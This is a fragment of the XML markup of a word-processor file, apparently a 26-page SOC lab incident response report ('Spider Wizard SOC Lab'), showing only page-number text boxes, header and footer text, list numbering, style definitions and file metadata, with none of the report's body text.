                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0">
          <wp:extent cx="1503680" cy="1397000"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="7" name="Picture 14" descr="images-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descr="images-removebg-preview"/>
                  <pic:cNvPicPr>
                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </pic:cNvPicPr>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId2"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1503680" cy="1397000"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:inline>
      </w:drawing>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="4" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="margin">
                <wp:align>center</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>635</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1828800" cy="154305"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="8" name="Text Box 10"/>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Header"/>
                            <w:rPr/>
                          </w:pPr>
                          <w:r>
                            <w:rPr/>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:instrText xml:space="preserve"> PAGE </w:instrText>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:t>1</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:fldChar w:fldCharType="end"/>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
                      <a:spAutoFit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:rect id="shape_0" stroked="f" o:allowincell="f" style="position:absolute;margin-left:180pt;margin-top:0pt;width:143.95pt;height:12.1pt;mso-wrap-style:none;v-text-anchor:top;mso-position-horizontal:center;mso-position-horizontal-relative:margin">
              <v:fill o:detectmouseclick="t" on="false"/>
              <v:stroke color="#3465a4" weight="6480" joinstyle="round" endcap="flat"/>
              <v:textbox>
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:pStyle w:val="Header"/>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6E4F0"/>
      </w:pBdr>
      <w:spacing w:before="0" w:after="100"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="52" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="margin">
                <wp:align>center</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>635</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1828800" cy="154305"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="10" name="Text Box 11"/>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Header"/>
                            <w:rPr/>
                          </w:pPr>
                          <w:r>
                            <w:rPr/>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:instrText xml:space="preserve"> PAGE </w:instrText>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:t>8</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:fldChar w:fldCharType="end"/>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
                      <a:spAutoFit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:rect id="shape_0" stroked="f" o:allowincell="f" style="position:absolute;margin-left:180pt;margin-top:0pt;width:143.95pt;height:12.1pt;mso-wrap-style:none;v-text-anchor:top;mso-position-horizontal:center;mso-position-horizontal-relative:margin">
              <v:fill o:detectmouseclick="t" on="false"/>
              <v:stroke color="#3465a4" weight="6480" joinstyle="round" endcap="flat"/>
              <v:textbox>
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:pStyle w:val="Header"/>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r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>Spider Wizard SOC Lab  |  Incident Response Report  |  spider.local     DEPI SOC Analyst 2026</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6E4F0"/>
      </w:pBdr>
      <w:spacing w:before="0" w:after="100"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="52" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="margin">
                <wp:align>center</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>635</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1828800" cy="154305"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="11" name="Text Box 11"/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1828800" cy="1544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Header"/>
                            <w:rPr/>
                          </w:pPr>
                          <w:r>
                            <w:rPr/>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:instrText xml:space="preserve"> PAGE </w:instrText>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:t>8</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:fldChar w:fldCharType="end"/>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
                      <a:spAutoFit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:rect id="shape_0" stroked="f" o:allowincell="f" style="position:absolute;margin-left:180pt;margin-top:0pt;width:143.95pt;height:12.1pt;mso-wrap-style:none;v-text-anchor:top;mso-position-horizontal:center;mso-position-horizontal-relative:margin">
              <v:fill o:detectmouseclick="t" on="false"/>
              <v:stroke color="#3465a4" weight="6480" joinstyle="round" endcap="flat"/>
              <v:textbox>
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:pStyle w:val="Header"/>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r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>Spider Wizard SOC Lab  |  Incident Response Report  |  spider.local     DEPI SOC Analyst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480" w:hanging="240"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="840" w:hanging="24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7"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="0" w:hanging="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86"/>
  <w:defaultTabStop w:val="720"/>
  <w:autoHyphenation w:val="true"/>
  <w:hyphenationZone w:val="0"/>
  <w:compat>
    <w:doNotExpandShiftReturn/>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qFormat="1"/>
    <w:lsdException w:name="endnote text" w:uiPriority="99"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0"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:color w:val="1A1A1A"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="320" w:after="120"/>
      <w:jc w:val="start"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1B3A5C"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="240" w:after="80"/>
      <w:jc w:val="start"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F5C99"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="160" w:after="60"/>
      <w:jc w:val="start"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4A7FA5"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2E74B5"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:color w:val="2E74B5"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:color w:val="1F4D78"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="DefaultParagraphFont" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="0"/>
    <w:semiHidden/>
    <w:qFormat/>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99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteTextChar" w:customStyle="1">
    <w:name w:val="Footnote Text Char"/>
    <w:link w:val="FootnoteText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="EndnoteTextChar" w:customStyle="1">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dnoteText">
    <w:name w:val="endnote text"/>
    <w:link w:val="EndnoteTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:color w:val="1A1A1A"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HeaderandFooter">
    <w:name w:val="Header and Footer"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="center" w:pos="4153" w:leader="none"/>
        <w:tab w:val="right" w:pos="8306" w:leader="none"/>
      </w:tabs>
      <w:snapToGrid w:val="false"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:link w:val="FootnoteTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:color w:val="1A1A1A"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="center" w:pos="4153" w:leader="none"/>
        <w:tab w:val="right" w:pos="8306" w:leader="none"/>
      </w:tabs>
      <w:snapToGrid w:val="false"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:uiPriority w:val="0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:color w:val="1A1A1A"/>
      <w:kern w:val="0"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:startChars="200"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:uiPriority w:val="0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:color w:val="1A1A1A"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="WPSOffice1" w:customStyle="1">
    <w:name w:val="WPSOffice手动目录 1"/>
    <w:uiPriority w:val="0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:start="0"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-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9">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image" Target="media/image4.jpeg"/><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112</TotalTime>
  <Application>LibreOffice/25.8.6.2$Linux_X86_64 LibreOffice_project/a46b460d1686bb49c718d2ef5f88b83ff2dc4981</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>26</Pages>
  <Words>4858</Words>
  <Characters>30257</Characters>
  <CharactersWithSpaces>34498</CharactersWithSpaces>
  <Paragraphs>798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2026-05-11T08:09:00Z</dcterms:created>
  <dc:creator>Un-named</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-11T21:02:43Z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CC4B7A9F92FE46EAABFD4A15B570526E_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.2.0.23196</vt:lpwstr>
  </property>
</Properties>
</file>